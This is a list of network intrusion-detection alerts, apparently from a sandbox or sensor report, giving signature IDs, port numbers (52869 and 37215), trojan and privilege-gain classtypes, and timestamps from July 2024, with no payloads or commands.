                      SID:2025132
                      Source Port:55118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.508021
                      SID:2831300
                      Source Port:50758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.161614
                      SID:2829579
                      Source Port:57304
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.512162
                      SID:2025132
                      Source Port:48972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.975107
                      SID:2835222
                      Source Port:50162
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.571884
                      SID:2025132
                      Source Port:60498
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.019773
                      SID:2027339
                      Source Port:47734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.811098
                      SID:2831300
                      Source Port:38390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.036064
                      SID:2835222
                      Source Port:45644
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.656962
                      SID:2027339
                      Source Port:42998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.572517
                      SID:2831300
                      Source Port:41196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.168569
                      SID:2829579
                      Source Port:57488
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.071062
                      SID:2829579
                      Source Port:55056
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.416441
                      SID:2025132
                      Source Port:48310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.663629
                      SID:2027339
                      Source Port:52128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.452119
                      SID:2027339
                      Source Port:40286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.198960
                      SID:2831300
                      Source Port:51080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.891992
                      SID:2027339
                      Source Port:56782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.062666
                      SID:2829579
                      Source Port:38446
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.684338
                      SID:2025132
                      Source Port:54702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.407049
                      SID:2027339
                      Source Port:35450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.260197
                      SID:2025132
                      Source Port:37826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.838688
                      SID:2831300
                      Source Port:52806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.114267
                      SID:2829579
                      Source Port:55126
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.725851
                      SID:2835222
                      Source Port:40854
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.469876
                      SID:2027339
                      Source Port:49768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.178390
                      SID:2027339
                      Source Port:42248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.089079
                      SID:2025132
                      Source Port:59652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.308763
                      SID:2831300
                      Source Port:52562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.076414
                      SID:2829579
                      Source Port:44728
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.571946
                      SID:2027339
                      Source Port:56214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.160375
                      SID:2025132
                      Source Port:38964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:09.627181
                      SID:2025132
                      Source Port:43442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.220685
                      SID:2835222
                      Source Port:36734
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650243
                      SID:2835222
                      Source Port:58900
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.934726
                      SID:2027339
                      Source Port:39634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.360712
                      SID:2027339
                      Source Port:55964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.013039
                      SID:2835222
                      Source Port:46716
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.119631
                      SID:2829579
                      Source Port:47984
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.150638
                      SID:2829579
                      Source Port:56188
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.891763
                      SID:2027339
                      Source Port:43436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.472422
                      SID:2831300
                      Source Port:49628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.474540
                      SID:2027339
                      Source Port:44732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.758954
                      SID:2831300
                      Source Port:59620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.684499
                      SID:2027339
                      Source Port:42886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.415157
                      SID:2831300
                      Source Port:53276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.602712
                      SID:2027339
                      Source Port:53166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.181938
                      SID:2829579
                      Source Port:49432
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.280564
                      SID:2027339
                      Source Port:46594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.066571
                      SID:2831300
                      Source Port:46598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:06.975117
                      SID:2835222
                      Source Port:48814
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.487978
                      SID:2027339
                      Source Port:52836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:10.589521
                      SID:2027339
                      Source Port:40326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.928521
                      SID:2835222
                      Source Port:47998
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.565561
                      SID:2831300
                      Source Port:51710
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.912947
                      SID:2027339
                      Source Port:34838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639011
                      SID:2835222
                      Source Port:37970
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.120339
                      SID:2025132
                      Source Port:59050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.286078
                      SID:2025132
                      Source Port:55492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.967549
                      SID:2027339
                      Source Port:44984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.365017
                      SID:2027339
                      Source Port:51488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650871
                      SID:2835222
                      Source Port:49532
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.951975
                      SID:2835222
                      Source Port:53174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221624
                      SID:2835222
                      Source Port:56366
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.165718
                      SID:2831300
                      Source Port:36230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.635828
                      SID:2835222
                      Source Port:56278
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221273
                      SID:2835222
                      Source Port:38628
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.888934
                      SID:2027339
                      Source Port:47644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.766644
                      SID:2027339
                      Source Port:57512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.725077
                      SID:2027339
                      Source Port:33474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.062043
                      SID:2025132
                      Source Port:52772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.580745
                      SID:2831300
                      Source Port:36440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.053251
                      SID:2027339
                      Source Port:37770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.513792
                      SID:2027339
                      Source Port:47262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222164
                      SID:2829579
                      Source Port:36788
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:17.110283
                      SID:2027339
                      Source Port:43866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.038833
                      SID:2027339
                      Source Port:46014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.055688
                      SID:2025132
                      Source Port:33598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.769239
                      SID:2027339
                      Source Port:32774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.511523
                      SID:2831300
                      Source Port:37662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.205247
                      SID:2027339
                      Source Port:48560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.338159
                      SID:2027339
                      Source Port:42886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.826234
                      SID:2831300
                      Source Port:36994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:04.577562
                      SID:2025132
                      Source Port:52992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.641498
                      SID:2829579
                      Source Port:33920
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.789220
                      SID:2025132
                      Source Port:40438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.455918
                      SID:2027339
                      Source Port:47652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.378872
                      SID:2027339
                      Source Port:38510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.403768
                      SID:2831300
                      Source Port:47372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.565561
                      SID:2027339
                      Source Port:34016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.776719
                      SID:2027339
                      Source Port:52656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.751499
                      SID:2027339
                      Source Port:38742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.094795
                      SID:2829579
                      Source Port:60280
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.864629
                      SID:2027339
                      Source Port:40650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.658221
                      SID:2829579
                      Source Port:58944
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.970191
                      SID:2027339
                      Source Port:49902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.845923
                      SID:2831300
                      Source Port:44268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.862410
                      SID:2829579
                      Source Port:51818
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.949008
                      SID:2831300
                      Source Port:59820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.631728
                      SID:2835222
                      Source Port:49720
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.919931
                      SID:2831300
                      Source Port:53412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.394890
                      SID:2831300
                      Source Port:60250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.751560
                      SID:2027339
                      Source Port:43748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.321964
                      SID:2829579
                      Source Port:46110
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.978141
                      SID:2829579
                      Source Port:57454
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.290002
                      SID:2829579
                      Source Port:34556
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.547161
                      SID:2025132
                      Source Port:36362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.222279
                      SID:2835222
                      Source Port:60150
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.915268
                      SID:2829579
                      Source Port:54390
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.579360
                      SID:2027339
                      Source Port:50838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.883171
                      SID:2835222
                      Source Port:33146
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.539170
                      SID:2027339
                      Source Port:53906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.775798
                      SID:2025132
                      Source Port:32852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.481754
                      SID:2831300
                      Source Port:57092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.005156
                      SID:2829579
                      Source Port:41344
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.220937
                      SID:2829579
                      Source Port:42510
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.592030
                      SID:2025132
                      Source Port:45658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.082385
                      SID:2829579
                      Source Port:57988
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.615260
                      SID:2027339
                      Source Port:36786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.227281
                      SID:2027339
                      Source Port:47622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.302920
                      SID:2027339
                      Source Port:33286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.772130
                      SID:2027339
                      Source Port:59538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.053180
                      SID:2027339
                      Source Port:42650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.143446
                      SID:2027339
                      Source Port:52638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.153933
                      SID:2027339
                      Source Port:34664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.637175
                      SID:2835222
                      Source Port:56940
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.643745
                      SID:2027339
                      Source Port:53628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.099799
                      SID:2027339
                      Source Port:39852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050672
                      SID:2829579
                      Source Port:50482
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.646615
                      SID:2027339
                      Source Port:52406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:14.945129
                      SID:2831300
                      Source Port:49536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.943232
                      SID:2025132
                      Source Port:39244
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.562013
                      SID:2027339
                      Source Port:44914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.965900
                      SID:2027339
                      Source Port:44986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.263272
                      SID:2027339
                      Source Port:39888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.244899
                      SID:2829579
                      Source Port:45032
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.858878
                      SID:2027339
                      Source Port:58408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.782123
                      SID:2025132
                      Source Port:47614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.951862
                      SID:2027339
                      Source Port:55238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.049279
                      SID:2835222
                      Source Port:58100
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221367
                      SID:2829579
                      Source Port:52450
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.931222
                      SID:2831300
                      Source Port:52006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.165469
                      SID:2027339
                      Source Port:48418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.577562
                      SID:2027339
                      Source Port:53524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.593640
                      SID:2027339
                      Source Port:44004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.452219
                      SID:2027339
                      Source Port:50638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.444817
                      SID:2025132
                      Source Port:54596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.456455
                      SID:2027339
                      Source Port:38254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.308623
                      SID:2027339
                      Source Port:58142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.858878
                      SID:2027339
                      Source Port:55910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.892811
                      SID:2831300
                      Source Port:35576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.454682
                      SID:2027339
                      Source Port:36628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.428221
                      SID:2027339
                      Source Port:55678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.175900
                      SID:2835222
                      Source Port:33096
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650871
                      SID:2835222
                      Source Port:52136
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.019772
                      SID:2025132
                      Source Port:59776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221223
                      SID:2835222
                      Source Port:44052
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.591862
                      SID:2831300
                      Source Port:58720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:03:46.099099
                      SID:2025132
                      Source Port:47524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.604394
                      SID:2025132
                      Source Port:56780
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.475794
                      SID:2025132
                      Source Port:48188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.037292
                      SID:2027339
                      Source Port:57826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.124695
                      SID:2835222
                      Source Port:42546
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.863362
                      SID:2027339
                      Source Port:36226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.550538
                      SID:2831300
                      Source Port:49074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.654172
                      SID:2835222
                      Source Port:36154
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.107973
                      SID:2025132
                      Source Port:49530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.304504
                      SID:2025132
                      Source Port:43656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.328855
                      SID:2027339
                      Source Port:47958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.210078
                      SID:2025132
                      Source Port:36794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.066571
                      SID:2831300
                      Source Port:38936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.320679
                      SID:2831300
                      Source Port:47936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.446628
                      SID:2025132
                      Source Port:48604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.191389
                      SID:2829579
                      Source Port:55620
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.389834
                      SID:2831300
                      Source Port:56604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.672378
                      SID:2027339
                      Source Port:44018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.983105
                      SID:2835222
                      Source Port:32934
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.276859
                      SID:2831300
                      Source Port:52278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.082045
                      SID:2835222
                      Source Port:36518
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.097795
                      SID:2835222
                      Source Port:43512
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.110241
                      SID:2027339
                      Source Port:35770
                      Destination Port:52869
